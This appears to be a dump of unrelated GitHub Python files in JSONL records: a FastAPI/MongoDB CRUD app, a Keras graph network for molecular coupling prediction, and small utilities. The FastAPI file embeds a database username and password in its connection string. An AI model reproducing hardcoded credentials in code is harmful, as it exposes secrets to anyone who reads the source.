1)[0]\n trial = RobotSlangSimulator(random_trial['scan'])\n trial.play()\n import ipdb; ipdb.set_trace()\n \n","repo_name":"MichiganCOG/RobotSlangBenchmark","sub_path":"rslang_simulator.py","file_name":"rslang_simulator.py","file_ext":"py","file_size_in_byte":13411,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"15838126842","text":"from library.metadata_class.convert_type import *\nfrom library.metadata_class.opus import *\nfrom library.metadata_class.episode import *\nfrom library.metadata_class.sequence import *\nfrom library.metadata_class.scene import *\nfrom library.metadata_class.shot import *\n\n\ndef class_from_dict(s: dict) -> Union[Opus, Season, Episode, Season, Scene, Shot]:\n \"\"\"\n :param s: dict of Metadata\n :return : Class of Metadata\n\n 무슨 메타데이터 타입인지 체크하여 dict을 Class로 변환\n check dictionary what Metadata type is and convert to Metadata Class\n \"\"\"\n type_list = ['seasons', 'episodes', 'sequences', 'scenes', 'shots', 'persons']\n class_list = [Opus, Season, Episode, Sequence, Scene, Shot]\n for i, key_type in enumerate(type_list):\n if key_type in s.keys():\n return class_list[i].from_dict(s)\n\n\ndef class_to_dict(x: Any) -> dict:\n \"\"\"\n :param x: Class of Metadata\n :return : dict\n\n convert Class to dict\n \"\"\"\n type_list = [Opus, Season, Episode, Sequence, Scene, Shot]\n for class_type in type_list:\n if isinstance(x, class_type):\n return to_class(class_type, x)\n\n\nif __name__ == '__main__':\n import json\n import os\n json_dir = 'json/'\n if not os.path.exists(json_dir):\n os.makedirs(json_dir)\n\n # get metadata class\n # 1. use_misaeng = True\n # read \"misaeng.json\"\n # 2. use_misaeng = False\n # create empty metadata\n use_misaeng = False\n if use_misaeng:\n misaeng_json = open(json_dir + 'misaeng.json', 'r', encoding='utf-8')\n default_data = json.load(misaeng_json)\n metadata_class = class_from_dict(default_data)\n else:\n default_data = {'opus_id': \"1005\", \"opus_name__kr\": \"예시\", \"opus_name__en\": \"Example\"}\n metadata_class = Opus.from_dict(default_data)\n\n # set default values and update ids\n metadata_class.init_class_variables()\n metadata_class.update_metadata()\n\n # get opus dict(), scene dict() and shot dict()\n scene_idx = 0\n shot_idx = 0\n\n opus_dict = metadata_class.to_dict()\n\n scene_class = metadata_class.seasons[0].episodes[0].sequences[0].scenes[scene_idx]\n scene_dict = scene_class.to_dict()\n\n shot_class = scene_class.shots[shot_idx]\n shot_dict = shot_class.to_dict()\n\n # print opus, scene, shot to JSON file\n opus_file = open(json_dir + '{}.json'.format(default_data['opus_id']), 'w', encoding='utf-8')\n scene_file = open(json_dir + '{}_scene_{}.json'.format(default_data['opus_id'], scene_idx), 'w', encoding='utf-8')\n shot_file = open(json_dir + '{}_scene_{}_shot_{}.json.'.format(default_data['opus_id'], scene_idx, shot_idx), 'w', encoding='utf-8')\n json.dump(opus_dict, opus_file, indent=2, ensure_ascii=False)\n json.dump(scene_dict, scene_file, indent=2, ensure_ascii=False)\n json.dump(shot_dict, shot_file, indent=2, ensure_ascii=False)\n print(\"{}.json is finished\".format(opus_dict))\n","repo_name":"sung0471/Flask-RESTful-Server","sub_path":"library/metadata_class/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1883267707","text":"from fastapi import FastAPI\r\nfrom pydantic import BaseModel\r\nfrom pymongo import MongoClient\r\n\r\n# Creating instance of mongo client\r\nclient = MongoClient(\"mongodb://intern_23:intern%40123@192.168.0.220:2717/interns_b2_23\")\r\n\r\n# Define a Pydantic model for items\r\nclass Item(BaseModel):\r\n name: str\r\n description: str\r\n price: float\r\n\r\napp = FastAPI()\r\n\r\n# POST endpoint for adding items to inventory\r\n@app.post(\"/add_items\")\r\ndef create_item(item: Item):\r\n db = client.interns_b2_23\r\n item_instance = db.subhash\r\n item_instance.insert_one(item.dict())\r\n return {\"message\": \"Item added successfully\"}\r\n\r\n# GET endpoint for retrieving items by name\r\n@app.get(\"/getItemByName/{item_name}\")\r\ndef read_item(item_name: str):\r\n db = client.interns_b2_23\r\n item_instance = db.subhash\r\n item = item_instance.find_one({\"name\": item_name})\r\n if item:\r\n return {\"item details\": item}\r\n else:\r\n return {\"error\": \"Item not found\"}\r\n\r\n# PUT endpoint for updating items by name\r\n@app.put(\"/item/{item_name}\")\r\ndef update_item(item_name: str, item: Item):\r\n db = client.interns_b2_23\r\n item_instance = db.subhash\r\n condition = {\"name\": item_name}\r\n update = {\"$set\": item.dict()}\r\n result = item_instance.update_one(condition, update)\r\n if result.modified_count > 0:\r\n return {\"message\": \"Item updated successfully\"}\r\n else:\r\n return {\"error\": \"Item not found\"}\r\n\r\n# DELETE endpoint for deleting items by name\r\n@app.delete(\"/deleteItemsByName/{item_name}\")\r\ndef delete_item(item_name: str):\r\n db = client.interns_b2_23\r\n item_instance = db.subhash\r\n result = item_instance.delete_one({\"name\": item_name})\r\n if result.deleted_count > 0:\r\n return {\"message\": \"Item deleted successfully\"}\r\n else:\r\n return {\"error\": \"Item not found\"}\r\n","repo_name":"subash291/Fastapi","sub_path":"pythonProject4/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2377506785","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import Conv1D, Conv2D, Input, concatenate, Layer, BatchNormalization, Reshape, Lambda, ReLU\nimport tensorflow.keras.activations as act\n\nfrom scipy.stats import ortho_group\n\nimport numpy as np\nimport pickle\n\npredict = False # compute predictions on test dataset\nload = False # load the weights from a previous run\n\nnum_epochs = 1\nvalid_size = 0 # rough number of samples kept aside for validation. A value of 0 turns off validaton\nlearning_rate = 0.0005 \n\nsave_interval = 3 # how often (epoch-wise) do we save the model's weights\nnum_ave = 10 # number of epochs to average the predictions over\nrav = 0.2 # 1/half-life for the exponential moving average of cross validation predictions\n\nbs = 48 # batch size, such that last batch is not too small (85003 % 92 = 87) \ntest_bs = 193 # assuming 8091 validation samples\npred_bs = 194 # 45772 % 194 = 182 \n\nuse_bonds = True\nuse_pos = False\nuse_dist_pow = 4\nbond_vec_only = True \nuse_angles = True\nuse_charge = True\nuse_mag_contrib = True\n \n#use_shield = 'trace' \nuse_shield = 'eigenvalues' \n#use_shield = 'tensor' # doesn't seem to work, even in fixed coo system\nrandom_frame = True\nrandom_pos = 0.0\n\nweight_file = \"squid-weights/weights.h5\"\nperm_file = \"squid-weights/permutation.p\"\n\ncontrib_weight = 0.2\ncharge_weight = 0.2\nshield_weight = 0.2\n\n# it would be better to get this from the dataset...\nnum_mag_contrib = 4\nnum_atom_per_mol = 29\nnum_pair_type = 8\nnum_atom_type = 5\nnum_bond_type = 5\nnum_bond_geom_feat = 3 + use_dist_pow + (1 if use_angles else 0) \nnum_atom_geom_feat = 3 \n\n# squid network geometry parameters\n\ngcvs = 384 # vertex size for graph convs\ngces = 48 # edge size for graph convs\novs = 512 # on-vertex FC size\noes = 384 # on-edge FC size\ntevs = 128 # vertex size before vertex -> edge conv \ntees = 128 # edge size after vertex -> edge conv\n \n\nprint(\"Input features:\")\nprint(\" - atomic number distinctions\")\nif use_bonds: print(\" - basic chemical bond types\")\nif bond_vec_only: print(\" - bond vectors\")\nelse: print(\" - vectors between any two atoms, divided by distance\")\nif use_dist_pow > 0: print(\" - inverse distance between all atom pairs and its powers up to\", use_dist_pow)\nif use_angles: print(\" - angles for 2JXX pairs and dihedral angles for 3JXX pairs\")\nif use_pos: print(\" - atom positions\")\n\nprint(\"Auxiliary targets:\")\nif use_charge: print(\" - Mulliken charges\", charge_weight)\nif use_shield == 'tensor': print(\" - Shielding tensors\", shield_weight)\nif use_shield == 'trace': print(\" - Traces of the shielding tensors\", shield_weight)\nif use_shield == 'eigenvalues': print(\" - Eigenvalues of the shielding tensors\", shield_weight)\nif use_mag_contrib: print(\" - All magnetic coupling contributions\", contrib_weight)\n \nprint(\"Data extension:\")\nif random_frame: print(\" - Randomized reference frame\")\nif random_pos > 0.0: print(\" - Noise on positions\", random_pos)\n \nroot = \"../input/\"\n\nfrom tensorflow.python.keras.utils.data_utils import Sequence\n\n# does 0-hot for category 0\ndef one_hot(x, num_cat):\n if len(x.shape)==2:\n return np.eye(num_cat+1, dtype=np.bool)[x][:,:,1:] \n elif len(x.shape)==1:\n return np.eye(num_cat+1, dtype=np.bool)[x][:,1:] \n else:\n print(\"one_hot: unexpected shape:\", x.shape)\n exit(1)\n\ndef make_geom(atom_pos, atom_type, bond_type, pair_type, pair_angles): \n n = atom_pos.shape[0] #num_atom_per_mol\n k = num_atom_type\n \n geom = np.zeros((n,n, num_bond_geom_feat)) \n\n # vector between every pairs\n delta = atom_pos.reshape(1,n,3) - atom_pos.reshape(n,1,3)\n \n # compute distances\n ir = np.reshape(np.sqrt(np.sum(delta**2, axis=2)), [n,n])\n nonzero = ir > 1e-6\n ir[nonzero] = 1/ir[nonzero]\n bond_mask = (bond_type > 0).reshape(n,n,1)\n bond_vec = delta * ir.reshape(n,n,1) * bond_mask\n \n # store unit bond vectors\n if bond_vec_only: geom[:,:,:3] = bond_vec # bond_vec * ir.reshape(n,n,1) #delta * bond_mask\n else: geom[:,:,:3] = delta * ir.reshape(n,n,1)**2 # or all vectors / distance\n ind = 3\n\n # store powers of the inverse distance between any two atoms \n if use_dist_pow > 0: \n geom[:,:,ind] = ir ; ind += 1\n for e in range(1,use_dist_pow):\n geom[:,:,ind] = geom[:,:,ind-1]*ir ; ind += 1\n\n # cos of angle between pairs bonded to the same atom\n if use_angles:\n geom[:,:,ind] = pair_angles \n \n return geom\n\ndef process_mol(atom_pos, atom_type, bond_type, pair_type, pair_angles, in_ring):\n geom = make_geom(atom_pos, atom_type, bond_type, pair_type, pair_angles)\n atom = np.concatenate((one_hot(atom_type, num_atom_type), np.expand_dims(in_ring, -1)), axis=-1)\n bond = one_hot(bond_type, num_bond_type)\n # add adjacency\n nv = bond.shape[0]\n identity = np.expand_dims(np.eye(nv, dtype=np.bool), -1)\n adjacency = np.sum(bond, axis=-1, keepdims=True) + identity\n bond = np.concatenate((adjacency, bond), axis=-1)\n return geom, atom, bond\n\nclass Generator(Sequence):\n def __init__(self, data, batch_size=92, extra=[], shuffle=False, use_mag_contrib=False, use_charge=False, use_shield=False, predict=False):\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.use_mag_contrib = use_mag_contrib\n self.use_charge = use_charge\n self.use_shield = use_shield\n self.predict = predict\n\n self.data = data\n self.data_extra = extra\n\n self.random_frame = random_frame if shuffle else False\n self.random_pos = random_pos if shuffle else 0.0\n \n self.num_sample = len(data) \n\n self.on_epoch_end()\n\n def __len__(self):\n 'Number of batches per epoch'\n return int(np.ceil(self.num_sample / self.batch_size))\n\n def get_indexes(self, index):\n return self.indexes[index*self.batch_size:min((index+1)*self.batch_size, self.num_sample)]\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n return self.__data_generation(self.get_indexes(index))\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(self.num_sample)\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n # needs to be called before rather than after the epoch since shuffling happens at epoch end...\n def get_pair_ids(self):\n num_mol = len(self.indexes)\n nam = num_atom_per_mol\n pair_ids = [] \n pairs = np.zeros((num_mol, nam, nam), dtype=np.bool)\n\n for m in self.indexes:\n _, _, _, pair_type, _, _, pair_id = self.data[m]\n na = pair_type.shape[0]\n pairs[m,:na,:na] = np.triu(pair_type > 0)\n pair_ids.extend(pair_id[pairs[m,:na,:na]])\n\n return pair_ids, pairs\n \n def get_targets(self):\n num_mol = len(self.indexes)\n nam = num_atom_per_mol\n all_pair_type = np.zeros((num_mol, nam, nam), dtype=np.int32)\n mag_tot = np.zeros((num_mol, nam, nam), dtype=np.float32)\n\n for m in self.indexes:\n _, _, _, pair_type, _, _, raw_mag = self.data[m]\n na = pair_type.shape[0]\n all_pair_type[m,:na,:na] = pair_type\n i = raw_mag[:,1].astype(np.int)\n j = raw_mag[:,2].astype(np.int)\n mag_tot[m, i, j] = mag_tot[m, j, i] = raw_mag[:,3]\n\n return mag_tot, all_pair_type\n\n def __data_generation(self, indexes):\n \n data = [self.data[i] for i in indexes] \n\n num_mol = len(data)\n nam = num_atom_per_mol\n atom = np.zeros((num_mol, nam, num_atom_type+1), dtype=np.bool) # +1 for ring atoms\n bond = np.zeros((num_mol, nam, nam, num_bond_type+1), dtype=np.bool) # +1 for adjacency\n geom = np.zeros((num_mol, nam, nam, num_bond_geom_feat), dtype=np.float32)\n pair = np.zeros((num_mol, nam, nam, num_pair_type), dtype=np.bool)\n\n if use_pos:\n atom_geom = np.zeros((num_mol, nam, num_atom_geom_feat), dtype=np.float32)\n\n extra = len(self.data_extra) > 0\n\n if extra:\n data_extra = [self.data_extra[i] for i in indexes]\n atom_charge = np.zeros((num_mol, nam, 1), dtype=np.float32)\n if self.use_shield == 'tensor':\n atom_shield = np.zeros((num_mol, nam, 3,3), dtype=np.float32)\n elif self.use_shield == 'trace':\n atom_shield = np.zeros((num_mol, nam, 1), dtype=np.float32)\n elif self.use_shield == 'eigenvalues':\n atom_shield = np.zeros((num_mol, nam, 3), dtype=np.float32)\n\n if not self.predict:\n mag = np.zeros((num_mol, nam, nam, num_mag_contrib), dtype=np.float32)\n mag_tot = np.zeros((num_mol, nam, nam), dtype=np.float32)\n \n for m, mol in enumerate(data):\n atom_pos_abs, atom_type, bond_type, pair_type, pair_angles, in_ring, _ = mol\n \n # random rotation matrix, to remove dependence on the reference frame\n if random_frame: \n R = ortho_group.rvs(dim=3).astype(np.float32)\n atom_pos = atom_pos_abs @ R \n else:\n atom_pos = atom_pos_abs\n \n if self.random_pos > 0.0: atom_pos += np.random.normal(scale = self.random_pos, size=atom_pos.shape)\n\n na = pair_type.shape[0]\n pair[m,:na,:na,:] = one_hot(pair_type, num_pair_type)\n \n geom[m,:na,:na,:], atom[m,:na,:], bond[m,:na,:na,:] = process_mol(atom_pos, atom_type, bond_type, pair_type, pair_angles, in_ring)\n \n if use_pos:\n atom_geom[m,:na,:] = atom_pos\n\n if not self.predict:\n raw_mag = mol[-1]\n mag_tot[m, raw_mag[:,1].astype(np.int), raw_mag[:,2].astype(np.int)] = raw_mag[:,3]\n mag_tot[m, raw_mag[:,2].astype(np.int), raw_mag[:,1].astype(np.int)] = raw_mag[:,3]\n\n if self.use_mag_contrib: \n mag[m, raw_mag[:,1].astype(np.int), raw_mag[:,2].astype(np.int), :] = raw_mag[:,4:8]\n mag[m, raw_mag[:,2].astype(np.int), raw_mag[:,1].astype(np.int), :] = raw_mag[:,4:8]\n \n if self.use_charge and extra: \n atom_charge[m, :na, 0] = data_extra[m][:, 0] \n \n if self.use_shield and extra: \n mol_extra = data_extra[m]\n T = np.reshape(mol_extra[:, 1:], (na, 3,3))\n # assuming both index transform as inverse of coordinates. Is that correct?\n # also we need to worry about the potential pseudo-ness of the tensor, given we use the whole ortho group\n if random_frame and self.use_shield == 'tensor':\n T = np.einsum('ij,aik->ajk', R, np.einsum('aij,jk->aik', T, R))\n\n if self.use_shield == 'tensor':\n atom_shield[m, :na, :,:] = T \n elif self.use_shield == 'trace':\n atom_shield[m, :na, 0] = np.einsum('aii->a', T)\n elif self.use_shield == 'eigenvalues':\n atom_shield[m, :na, :] = np.linalg.eigvalsh(T) \n else:\n print(\"unknown shielding tensor use type:\", self.use-shield)\n exit(1)\n\n if use_bonds: inputs = [atom, bond, geom, pair]\n else: inputs = [atom, bond, geom, pair]\n if use_pos: inputs.append(atom_geom)\n \n if not self.predict:\n targets = [mag_tot]\n if self.use_mag_contrib: targets.append(mag)\n if self.use_charge and extra: targets.append(atom_charge)\n if self.use_shield and extra: targets.append(atom_shield)\n return inputs, targets\n else: \n return inputs\n\n \nprint(\"loading the data\")\n \ntrain_data = pickle.load(open(root+\"pickled-molecules/molecules.p\", \"rb\"))\npred_data = pickle.load(open(root+\"pickled-molecules/molecules_test.p\", \"rb\"))\nextra_data = pickle.load(open(root+\"pickled-molecules/molecules_extra.p\", \"rb\"))\n\nnum_tot = len(train_data)\nparams = { 'use_mag_contrib': use_mag_contrib, \n 'use_charge': use_charge,\n 'use_shield': use_shield }\n\nif valid_size > 0:\n if load:\n print(\"loading choice of validation instances\")\n perm, num_test = pickle.load( open( root+perm_file, \"rb\" ) )\n else:\n num_test = valid_size + ((num_tot - valid_size) % bs)\n perm = np.random.permutation(range(num_tot))\n \n pickle.dump((perm, num_test), open( \"permutation.p\", \"wb\" ))\n \n def sep(X): return [X[i] for i in perm[:num_test]], [X[i] for i in perm[num_test:]] \n\n print(f\"setting {num_test} samples aside for validation\")\n\n valid_data, train_data = sep(train_data)\n valid_extra, extra_data = sep(extra_data)\n validation_generator = Generator(valid_data, shuffle=False, extra=valid_extra, batch_size=test_bs, **params) \n\ntraining_generator = Generator(train_data, shuffle=True, extra=extra_data, batch_size=bs, **params)\nprediction_generator = Generator(pred_data, predict=True, shuffle=False, batch_size=pred_bs, **params)\n\nprint(\"building the network\") \n\nclass toEdges(Layer):\n\n def __init__(self, num_edge_filter, relu=False, **kwargs):\n self.ney = num_edge_filter\n self.relu = relu\n super(toEdges, self).__init__(**kwargs)\n\n def build(self, input_shape):\n shape_V = input_shape\n\n self.nv = int(shape_V[1])\n self.nvx = int(shape_V[2])\n\n self.W = self.add_weight(name='kernel', shape=(self.nvx, self.nvx, self.ney), initializer='uniform', trainable=True)\n self.b = self.add_weight(name='kernel', shape=(self.ney,), initializer='zeros', trainable=True)\n\n super(toEdges, self).build(input_shape)\n\n def call(self, V):\n\n aux = tf.einsum('bux,xyf->buyf', V, self.W)\n E = tf.einsum('buyf,bvy->buvf', aux, V) + self.b\n\n return act.relu(E) if self.relu else E\n\n def compute_output_shape(self, input_shape):\n return (self.nv, self.ney, self.nv)\n\n\nclass GraphConv(Layer):\n\n def __init__(self, num_vertex_filter, relu=False, **kwargs):\n self.nvy = num_vertex_filter\n self.relu = relu\n super(GraphConv, self).__init__(**kwargs)\n\n def build(self, input_shape):\n shape_V, shape_E = input_shape\n self.nv = int(shape_V[1])\n self.nvx = int(shape_V[2])\n self.nex = int(shape_E[3])\n\n self.W = self.add_weight(name='kernel', shape=(self.nex, self.nvx, self.nvy), initializer='uniform', trainable=True)\n self.b = self.add_weight(name='kernel', shape=(self.nvy,), initializer='zeros', trainable=True)\n\n super(GraphConv, self).build(input_shape)\n\n def call(self, x):\n V, E = x\n \n aux = tf.einsum('buvx,bvy->buxy', E, V)\n V2 = tf.einsum('buxy,xyf->buf', aux, self.W) + self.b\n\n return act.relu(V2) if self.relu else V2\n\n def compute_output_shape(self, input_shape):\n return (self.nv, self.nvy)\n\n\n# some useful layers\nrelu = lambda x: ReLU()(x)\nreban = lambda x: ReLU()(BatchNormalization()(x))\nbaner = lambda x: BatchNormalization()(ReLU()(x))\n\nonEdge = lambda n: Conv2D(n, kernel_size=(1,1), strides=(1,1))\ndef onVertex(n, **kwargs): return Conv1D(n, kernel_size=(1,), strides=(1,), **kwargs)\ndef Symmetrize(perm=(0,2,1), **kwargs): return Lambda(lambda T: 0.5*(T + tf.transpose(T, perm=perm)), **kwargs)\ndef Trace(**kwargs): return Lambda(lambda T: tf.reshape(tf.trace(T), tf.concat([tf.shape(T)[:-2], [1]], axis=0)), **kwargs)\n\ndef SumPool(axis=-1, keepdims=False, **kwargs): \n return Lambda(lambda arg: tf.reduce_sum(arg, axis=axis, keepdims=keepdims), **kwargs)\n\ndef MaskedSumPool( axis=-1, keepdims=False, **kwargs): \n return Lambda(lambda args: tf.reduce_sum(args[0]*args[1], axis=axis, keepdims=keepdims), **kwargs)\n\ndef gcblock(m, v, e):\n return reban(GraphConv(m)([v, e]))\n \n# the Squid network\n\ninA = Input(shape=(num_atom_per_mol, num_atom_type+1)) \ninB = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_bond_type+1)) \ninG = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_bond_geom_feat)) \ninP = Input(shape=(num_atom_per_mol, num_atom_per_mol, num_pair_type))\n\ninE = concatenate([inG, inB, inP]) \n\nif use_bonds:\n inE = concatenate([inG, inB, inP]) \nelse:\n inE = concatenate([inG, inP]) \n\nif use_pos: \n inX = Input(shape=(num_atom_per_mol, num_atom_geom_feat)) \n inV = concatenate([inA, inX])\nelse:\n inV = inA\n\ndef init_edges(out_size):\n e = inE\n e = reban(onEdge(oes)(e))\n e = reban(onEdge(oes)(e))\n e = reban(onEdge(oes)(e))\n return reban(onEdge(out_size)(e))\n\ndef init_vertices(out_size):\n v = inV\n v = reban(onVertex(ovs)(v))\n v = reban(onVertex(ovs)(v))\n v = reban(onVertex(ovs)(v))\n return reban(onVertex(out_size)(v)) \n\nv = init_vertices(gcvs)\ne = init_edges(gces)\n\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\n\n\nif use_charge: \n v2 = relu(onVertex(ovs)(v))\n outC = onVertex(1,name=\"charge\")(relu(onVertex(ovs)(v2))) \n v = concatenate([outC, v])\n \nif use_shield == 'tensor': \n # this doesn't seem to work at all ... probably because they gave us the tensors in the wrong coo system\n v2 = relu(onVertex(ovs)(v))\n flatS = onVertex(9)(relu(onVertex(ovs)(v2))) \n outS = Symmetrize(perm=(0,1,3,2), name=\"shield\")(Reshape((num_atom_per_mol,3,3))(flatS))\n v = concatenate([Trace()(outS), v])\n \nelif use_shield == 'trace': \n v2 = relu(onVertex(ovs)(v))\n outS = onVertex(1, name=\"shield\")(relu(onVertex(ovs)(v2))) \n v = concatenate([outS, v])\n \nelif use_shield == 'eigenvalues': \n v2 = relu(onVertex(ovs)(v))\n outS = onVertex(3, name=\"shield\")(relu(onVertex(ovs)(v2))) \n v = concatenate([outS, v])\n\nv = gcblock(gcvs, v, e)\nv = gcblock(gcvs, v, e)\n\nv = reban(GraphConv(tevs)([v, e]))\ne = concatenate([reban(toEdges(tees)(v)), e])\n\ne = reban(onEdge(oes)(e))\ne = reban(onEdge(oes)(e))\ne = reban(onEdge(oes)(e))\n \nif use_mag_contrib: \n es = [onEdge(num_pair_type)(e) for i in range(num_mag_contrib)]\n es = [MaskedSumPool(keepdims=True)([e, inP]) for e in es]\n outM = Symmetrize(perm=(0,2,1,3), name=\"contrib\")(concatenate(es, axis=-1))\n outMtot = SumPool(name=\"mag\")(outM)\nelse:\n e = onEdge(num_pair_type)(e)\n outMtot = Symmetrize(perm=(0,2,1), name=\"mag\")(MaskedSumPool()([e, inP]))\n\nouts = [outMtot]\nif use_mag_contrib: outs.append(outM)\nif use_charge: outs.append(outC)\nif use_shield: outs.append(outS)\n\nif use_pos:\n model = Model(inputs=[inA, inB, inG, inP, inX], outputs=outs)\nelse:\n model = Model(inputs=[inA, inB, inG, inP], outputs=outs)\n\ndef MagLoss(P):\n def loss(M_true, M_pred):\n err = 0.0\n for k in range(num_mag_contrib):\n for t in range(num_pair_type):\n err += tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(M_true[:,:,:,k] - M_pred[:,:,:,k], P[:,:,:,t]))))\n return err/(num_mag_contrib*num_pair_type)\n return loss\n\ndef TotMagLoss(P):\n def loss(M_true, M_pred):\n err = 0.0\n for t in range(num_pair_type):\n err += tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(M_true - M_pred, P[:,:,:,t]))))\n return err/num_pair_type\n return loss\n\ndef ChargeLoss(A):\n def loss(C_true, C_pred):\n return tf.math.log(tf.reduce_mean(tf.abs(tf.boolean_mask(C_true - C_pred, tf.reduce_sum(A, axis=2)))))\n return loss\n \ndef ShieldLoss(A):\n if use_shield == 'tensor':\n def loss(S_true, S_pred):\n mask = tf.reduce_sum(A, axis=2)\n return tf.math.log(tf.reduce_mean(tf.boolean_mask(tf.norm(S_true - S_pred, axis=[-2,-1], ord='fro'), mask)))\n elif use_shield == 'trace' or use_shield == 'eigenvalues':\n def loss(S_true, S_pred):\n mask = tf.reduce_sum(A, axis=2)\n return tf.math.log(tf.reduce_mean(tf.boolean_mask(tf.abs(S_true - S_pred), mask)))\n\n return loss \n \nlosses = [TotMagLoss(inP)]\nloss_weights = [1.0]\nif use_mag_contrib: \n losses.append(MagLoss(inP))\n loss_weights.append(contrib_weight)\nif use_charge: \n losses.append(ChargeLoss(inA))\n loss_weights.append(charge_weight)\nif use_shield: \n losses.append(ShieldLoss(inA))\n loss_weights.append(shield_weight)\n \nopt = keras.optimizers.Adam(lr=learning_rate) \n\nmodel.compile(optimizer=opt, loss=losses, loss_weights=loss_weights)\n\nprint(\"learning rate = \", keras.backend.get_value(model.optimizer.lr))\n\n\nif load:\n print(\"loading weights from previous run\", end=\"...\")\n model.load_weights(root+weight_file)\n print(\"done\")\n\nif predict:\n print(\"producing prediction pair ids\")\n ids, pred_pairs = prediction_generator.get_pair_ids()\n pred_ids = pd.Series(ids, name=\"id\")\n\nif valid_size > 0:\n print(\"producing validation targets\")\n target_mag, val_pair = validation_generator.get_targets()\n \nfor epoch in range(num_epochs):\n\n print(\"epoch \", epoch+1, \"/\", num_epochs)\n \n model.fit_generator(generator = training_generator, epochs=1, verbose=2) \n\n # cross validation. After 10 epochs, starts a running average to smooth out fluctuations due to ADAM\n if valid_size > 0:\n val_preds = model.predict_generator(generator = validation_generator, verbose=2) \n if type(val_preds) == list: val_mag = val_preds[0] \n else: val_mag = val_preds\n \n if epoch < 10: ave_val_mag = val_mag\n else: ave_val_mag = (1.0-rav)*ave_val_mag + rav*val_mag\n \n err_ave = 0.0\n for t in range(num_pair_type):\n mask = (val_pair==t+1)\n err_ave += np.log(np.mean(np.abs(target_mag[mask]-ave_val_mag[mask])))/num_pair_type\n \n print(\"validation accuracy: \", err_ave)\n \n # saves the model weights for continuing the learning in a different session\n if (epoch+1) % save_interval == 0 or epoch == num_epochs:\n filename = \"weights.h5\"\n model.save_weights(filename)\n print(\"saved model weights in \"+filename)\n \n # prediction using the test dataset. Also makes an average, which is useful for large ADAM learning rate\n n = epoch - (num_epochs-1-num_ave)\n if predict and n >= 1:\n print(\"computing predictions\")\n preds = model.predict_generator(generator = prediction_generator, verbose=2) \n if type(preds) == list: pred_mag = preds[0] \n else: pred_mag = preds\n \n if n==1: pred_ave = pred_mag[pred_pairs]\n else: pred_ave = ((n-1)*pred_ave + pred_mag[pred_pairs])/n\n\n preds = pd.Series(pred_ave, name=\"scalar_coupling_constant\")\n pd.concat([pred_ids, preds], axis = 1).sort_values('id', inplace=False).to_csv(\"predictions.csv\", index=False)\n \n\n ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/champs-scalar-coupling/Cédric Bény/squid.py","file_name":"squid.py","file_ext":"py","file_size_in_byte":22997,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"9061567607","text":"class Course:\n\n def __init__(self, name):\n self.name = name\n self.distance = 0\n self.ascent = 0\n self.descent = 0\n self.segments = []\n self._reset_metrics()\n\n def _reset_metrics(self):\n self.labels = []\n self.distances = []\n self.ascents = []\n self.descents = []\n self.steepnesses = []\n self.elevations = []\n self.elevation_labels = []\n\n def add_segment(self, segment):\n self.segments.append(segment)\n self._update_from_segements()\n\n def add_segments(self, segments):\n for s in segments:\n self.add_segment(s)\n\n def _update_from_segements(self):\n self._reset_metrics()\n for i, s in enumerate(self.segments):\n self.labels.append(s.label)\n self.distances.append(s.distance)\n self.ascents.append(s.ascent)\n self.descents.append(s.descent)\n self.steepnesses.append(s.steepness)\n self.elevations.extend(s.elevation)\n self.elevation_labels.extend([i] * len(s.elevation))\n self.distance = sum(self.distances)\n self.ascent = sum(self.ascents)\n self.descent = sum(self.descents)\n","repo_name":"sudoale/gpx_stats","sub_path":"src/models/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74229301602","text":"import cv2\n\n\ndef colour_to_bw(original_image_path, output_path):\n '''\n Function to convert colour image to black and white\n '''\n original_image = cv2.imread(original_image_path)\n gray_img = cv2.cvtColor(original_image, cv2.COLOR_BGR2GRAY)\n thresh = 128\n img_bw = cv2.threshold(gray_img, thresh, 255, cv2.THRESH_BINARY)[1]\n cv2.imwrite(output_path + 'final_image.png', img_bw)\n","repo_name":"python-geeks/Automation-scripts","sub_path":"colorimage_bw/colour_to_bw.py","file_name":"colour_to_bw.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"} +{"seq_id":"32627299159","text":"from math import comb\nclass Solution:\n def numIdenticalPairs(self, nums: List[int]) -> int:\n hashmap = {}\n for i in nums:\n if i in hashmap:\n hashmap[i] += 1\n else:\n hashmap[i] = 1\n \n pairs = 0 \n for i in hashmap.values():\n pairs += comb(i,2)\n \n return pairs\n","repo_name":"nahubn1/Competitive-programing","sub_path":"Number of Good Pairs.py","file_name":"Number of Good Pairs.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31350036180","text":"from random import *\r\nimport numpy as np\r\nimport random\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import datasets as ds\r\nfrom sklearn.datasets import (load_iris,make_classification)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.datasets import make_regression\r\nimport seaborn as sns\r\nfrom mlxtend import plotting as pl\r\nfrom 